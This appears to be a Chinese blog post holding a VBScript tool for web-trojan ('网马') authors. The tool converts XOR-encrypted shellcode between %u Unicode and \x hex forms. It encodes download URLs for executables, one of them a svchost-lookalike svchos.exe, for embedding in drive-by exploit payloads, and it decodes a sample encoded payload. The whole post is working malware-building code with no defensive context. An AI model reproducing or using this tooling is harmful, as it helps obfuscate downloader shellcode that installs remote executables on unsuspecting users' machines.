网马Unicode的一些转换（有bug）

fuchou-angle

网马Unicode的一些转换（有bug）
code="%u5549%u5155%u0E1B%u560E%u5656%u520F%u494E%u0F54%u4E42%u0E4C%u0F10%u5944%u0044"

function replaceregex(str) '正则Unicode转16进制
Sstr=Replace(str,"%u","")
set regex=new regExp
regex.pattern="(..)(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(Sstr,"$2$1")
replaceregex=matches
end Function
function replaceu(str) '\x16进制的shellcode转Unicode
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceu=matches
end Function
Function xor_Hex2Str(hexStr,n) '还原成未加密的\x形式
Dim sstr,hextmp
For i = 1 To Len(hexStr) step 2
   hexTmp = Mid(hexStr,i,2)
   b=hex(CLng("&h" & hexTmp) Xor n )
   If Len(b) = 1 Then b = "0" & b
    If hexTmp <> "00"   Then
    sstr = sstr & "\x" & b
   
   End if
Next
xor_Hex2Str = sstr
End Function

Function Xor_Str2Hex(strHex,n) '转成已加密的\x形式
Dim sHex
k=Split(strHex,"\x")
For i = 1 To ubound(k)
b=hex(CLng("&h" & k(i)) Xor n )
If Len(b) = 1 Then b = "0" & b
sstr=sstr & "\x" & b
Next
Xor_Str2Hex=sstr
End Function

Function Xor_ascii2Hex(strHex,n) 'ascc字符转16进制异或
Dim sHex
For i = 1 To Len(strHex)
     b=Hex(Asc(Mid(strHex,i,1)) Xor n)
        If Len(b) = 1 Then b = "0" & b
   sHex = sHex &"\x"& b
Next
    ascii2Hex=sHex
If UBound(split(ascii2Hex,"\x")) Mod 2 <> 0 Then ascii2Hex=ascii2Hex & "\x00" '我是补的00
Xor_ascii2Hex = ascii2Hex
End Function

Function Hex2Str(hexStr,n) '\xshellcode转字符
Dim sstr,hextmp
For i = 1 To Len(hexStr) step 2
   hexTmp = Mid(hexStr,i,2)
   If hexTmp <> "00" Then
    sstr = sstr & Chr(CLng("&h" & hexTmp) Xor n)
   End If
Next
Hex2Str = sstr
End Function

set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("b.txt",8,true)
fileS.writeline "=============开始======================"
fileS.writeline xor_Hex2Str(replaceregex(code),&hbd) 'Unicode转成16进制，异或解密
fileS.writeline "==============结束====================="
fileS.writeline "=============开始======================"
fileS.writeline Xor_Str2Hex(xor_Hex2Str(replaceregex(code),&hbd),&hbd) '16进制shellcode异或加密
fileS.writeline "=============结束======================"
fileS.writeline "=============开始======================"
fileS.writeline Xor_ascii2Hex("http://87487575.com/dem.exe",&h21) 'ascc字符转16进制异或
fileS.writeline "=============结束======================"
fileS.writeline "=============开始======================"
fileS.writeline replaceu(Xor_ascii2Hex("http://www.tehor.org/svchos.exe",&hbd)) 'ascc字符转16进制异或再转unicode 有bug 。如果url长度是单数就不行。我补00了
fileS.writeline "=============结束======================"
fileS.writeline "=============结束======================"
fileS.writeline Hex2Str(replaceregex("%uC9D5%ucdc9%u9287%u8592%u898A%u8A85%u8A88%u9388%uD2DE%u92D0%uD8D9%ud2d0%ud893%ud8c5"),&hBD) 'unicode异或解密解到ascc字符
fileS.writeline "=============结束======================"
files.close
set fso=Nothing